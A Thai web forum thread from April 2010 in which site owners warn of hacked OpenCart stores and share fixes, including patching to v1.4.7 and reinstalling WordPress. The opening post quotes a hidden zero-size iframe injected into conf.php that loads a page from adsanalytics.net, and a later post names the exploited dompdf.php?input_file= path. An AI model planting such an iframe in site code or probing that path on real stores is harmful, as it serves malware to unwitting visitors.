ระวังร้าน OpenCart ของท่าน โดนแฮ็ค ( stein.cz.cc , adsanalytics.net )

ohmohm · 13 เมษายน 2010, 00:20:47

เข้าไปดูของตัวเอง พอจะคลิ๊กสินค้า เจอ dialog เตือนจาก stein.cz.cc ทำนองว่า browser เก่าไป

พอไปดู conf.php ของตัวเอง ด้วย ftp พบว่า modified date เป็นเมื่อวาน ซึ่งไม่น่าเป็นไปได้ get มาดู ก็เจอ

โค้ด เลือก

$INJ = '<iframe width=0 height=0 style='display:none' src="http://adsanalytics.net/in.cgi?2"></iframe>';

พอเอา คำว่า adsanalytics.net ไปค้น เจอเลยครับ
http://forum.opencart.com/viewtopic.php?f=20&t=13276

มันโจมตี ผ่าน system/helper/dompdf/dompdf.php
มันพึ่งโจมตี วันที่ 11 ก็คือเมื่อไม่กี่วันนี้เองครับ เลยมีออก v1.4.7 มาแก้ทันทีกันเลยครับ

PornClip · 13 เมษายน 2010, 00:25:05

งานเข้าแล้ว OpenCart

ohmohm · 13 เมษายน 2010, 00:45:40

ของผมมัน version เก่าด้วยอะครับ แต่มันพึ่งคุกคามมาไม่กี่วัน แล้วตัวแก้ก็มาเกือบจะทันที
v1.4.7 วันที่ 11 เมษายน http://forum.opencart.com/viewtopic.php?f=2&t=13216
v1.4.6 update วันที่ 3 เมษายน http://forum.opencart.com/viewtopic.php?f=2&t=12925

andiklin · 13 เมษายน 2010, 00:54:18

ขอบคุณที่มาเตือนครับ เดี๋ยวต้องไปดูของตัวเองแล้วครับ

Halogen · 13 เมษายน 2010, 01:49:40

เลิกใช้ไปแล้วครับ

vii · 15 เมษายน 2010, 08:49:49

โดนเต็มๆซะแล้วสำหรับ e-commerce ไอ้ตัวเล็กตัวนี้.. ก็อัปเดทแก้กันไป
ตอนนี้พวกสคริป shopping cart ฟรีมีหลายตัวแต่ที่เวิร์คจริงมันน้อยเหลือเกิน
magento ก็ดีแต่ใหญ่และอืดมาก ต้องเล่นระดับ vps
prestashop ตัวใหม่แค่ติดตั้งแล้วลองสั่งซื้อ เอ่อ.. order creation failed เอาตรงขั้นตอนสุดท้าย
opencart ก็น่าจะดี...
oscommerce ...เก่ามาก..

moneylicker · 18 เมษายน 2010, 09:39:31

ของผมเป็น wp ก็โดนอ่ะ แก้ไงอะครับ

ohmohm · 18 เมษายน 2010, 16:39:17

มันคง inject มาทาง /artshop/upload/system/helper/dompdf/dompdf.php?input_file= ( http://forum.opencart.com/viewtopic.php?f=20&t=13212 ) ละครับ ลบไฟล์นี้ออก ก็น่าจะปลอดภัย

อ้างถึงจาก: moneylicker ใน 18 เมษายน 2010, 09:39:31
ของผมเป็น wp ก็โดนอ่ะ แก้ไงอะครับ

ใช้ wp version ไหนฮะ

โกโลโกโส · 18 เมษายน 2010, 17:08:05

ผมใช้ wp 2.9.1 ก็โดนเหมือนกันครับแก้ยังไงตรงไหน ท่านใดรู้ช่วยบอกผมที - -"

HotelBestBuy · 18 เมษายน 2010, 17:13:05

joomla บางเวบที่ทำเพิ่งโดนตัวนี้เข้าไปครับ
ยังไม่ทันได้ไล่ดูละเอียด แต่รู้สึกว่าอาจเกียวกับ url redirect ในเวบด้วย -_-'

mama2008 · 18 เมษายน 2010, 17:44:11

wp โดนเต็มๆเลยครับ หาวิธีแก้อยู่ เดวได้แล้วจะมาอัพเดทครับ

mama2008 · 18 เมษายน 2010, 17:52:09

คราวก่อนโดน iframe มันไปฝั่งไว้ใน เทมเพลตเปลี่ยนเทมเพลตก็หาย คราวนี้พอเปลี่ยน เทมเพลต เว็บหายเลยพี่น้อง ใครโดนระวังหน่อยนะครับ

โกโลโกโส · 18 เมษายน 2010, 17:56:40

อ้างถึงจาก: mama2008 ใน 18 เมษายน 2010, 17:44:11
wp โดนเต็มๆเลยครับ หาวิธีแก้อยู่ เดวได้แล้วจะมาอัพเดทครับ

แก้ได้แจ้งด้วยนะครับ ผมหาอยู่แต่ยังไม่เจอ (ทำไม่เป็นด้วยครับ อิอิ)

xinexo · 18 เมษายน 2010, 17:57:32

ใครใช้รีบอัพด่วนนะครับ

mama2008 · 18 เมษายน 2010, 18:41:44

wp ใครโดนบ้างครับ ยังหาทางแก้ไม่ได้เลย

โกโลโกโส · 18 เมษายน 2010, 18:44:02

^
^
^
ผมแก้ได้แล้วครับ ลงใหม่เลย เอิ๊กๆ

โชคดีนะครับ

mama2008 · 18 เมษายน 2010, 18:52:17

อ้างถึงจาก: โกโลโกโส ใน 18 เมษายน 2010, 18:44:02
^
^
^
ผมแก้ได้แล้วครับ ลงใหม่เลย เอิ๊กๆ

โชคดีนะครับ

ลงใหม่!!!!!!!!!!
และข้อมูลเก่าละครับ ลงใหม่นี่หมายถึงเอามาทับอันเดิมใช่ไหมครับ หรือว่าลบทำใหม่เลย

โกโลโกโส · 18 เมษายน 2010, 19:03:41

ผมลบแล้วลงใหม่นะครับ ทำแบบบ้านๆเลย เอิ๊กๆ

ผมลบ wp ตัวเก่าออกหมด เก็บแค่ theme plugin ไฟล์ที่อัพโหลด ไฟล์wp-config ไว้ก่อน ส่วนDBผมไม่ได้ลบนะครับ
แล้วก็อัพ wp ตัวใหม่ขึ้นไป แล้วก็เอาไฟล์ที่แบ็คอัพไว้ทั้งหมดอัพขึ้นไปไว้ตำแหน่งเดิม

**ที่จริงผมว่าอัพทับมันก็น่าจะได้นะครับ

mama2008 · 18 เมษายน 2010, 19:08:21

ลองอัพไปทับแล้วไม่ได้สงสัยต้องลบบ้างแหละ และถ้ามันมาอีกเราต้องลบอีกหรอนี่ น่าจะมีวิธีดีกว่านี่นะ

โกโลโกโส · 18 เมษายน 2010, 19:09:59

อ้างถึงจาก: mama2008 ใน 18 เมษายน 2010, 19:08:21
ลองอัพไปทับแล้วไม่ได้สงสัยต้องลบบ้างแหละ และถ้ามันมาอีกเราต้องลบอีกหรอนี่ น่าจะมีวิธีดีกว่านี่นะ

ถ้ารู้วิธีบอกผมด้วยนะครับ ^ ^